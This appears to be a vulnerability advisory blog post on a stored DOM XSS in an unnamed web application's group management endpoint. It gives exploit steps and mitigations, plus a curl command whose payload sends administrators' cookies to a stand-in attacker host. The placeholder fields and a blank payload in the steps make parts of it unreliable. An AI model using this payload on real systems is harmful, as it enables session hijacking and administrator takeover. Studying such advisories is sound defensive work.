Application Platform, Stored DOM XSS, CVE-[CVE-ID-PENDING] (Critical)

Listen to this Post

The vulnerability is a Stored DOM-based Cross-Site Scripting (XSS) issue residing in the group and role management functionalities. The application fails to sanitize user-controlled input across three distinct group-related fields. When an attacker injects a malicious JavaScript payload into these fields during group creation or editing, the payload is stored on the server without proper encoding or sanitization. Subsequently, when an administrator accesses privileged administrative views, such as the role and permission management interfaces, the application retrieves this stored data and renders it unsafely. This occurs because the application likely uses insecure JavaScript methods like `.html()` or innerHTML sinks to insert the data into the Document Object Model (DOM) instead of safe text-based methods. The injection point is within the administrative context, meaning the payload executes with the victim’s (administrator’s) full privileges. The attack vector is the endpoint /backend/users/groupList/, where the unsanitized input is processed and stored. The proof of concept demonstrates that an arbitrary payload, such as <img src=x onerror=alert(document.domain)>, executes automatically upon page view. The root cause is the absence of output encoding and the reliance on unsafe DOM manipulation techniques for rendering stored user data.

Platform: Web Application
Version: [Version X.Y.Z]
Vulnerability: Stored DOM XSS
Severity: Critical
date: 2026-03-31

Prediction: Patch within weeks

What Undercode Say:

Simulate malicious group creation via API
curl -X POST https://target.com/backend/users/groupList/ \
-H "Cookie: session=attacker_session" \
-d "group_name=<img src=x onerror=fetch('https://attacker.com/steal?cookie='+document.cookie)>"
// JavaScript sink detection in source code
const vulnerableSinks = ['innerHTML', 'outerHTML', 'insertAdjacentHTML', 'document.write'];
// Search for usage with dynamic data
grep -rE ".(innerHTML|outerHTML)\s=" . --include=".js"

Exploit:

1. Navigate to Group/Role Management page.

  1. Inject payload `` into any group field.

3. Save changes, storing payload server-side.

  1. Wait for administrator to load the group management view.
  2. Payload executes in admin’s browser, allowing session hijacking or privilege escalation.

Protection from this CVE:

  • Use `textContent` instead of `innerHTML` for DOM updates.
  • Implement strict output encoding (HTML entity encoding) on server-side rendering.
  • Apply Content Security Policy (CSP) to block inline script execution.
  • Set HttpOnly, Secure, and `SameSite` flags on cookies to mitigate session theft.
  • Validate and sanitize all user inputs on the server before storage.

Impact:

  • Persistent compromise of administrative accounts.
  • Complete application takeover via privilege escalation.
  • Data theft, defacement, and lateral movement within the infrastructure.
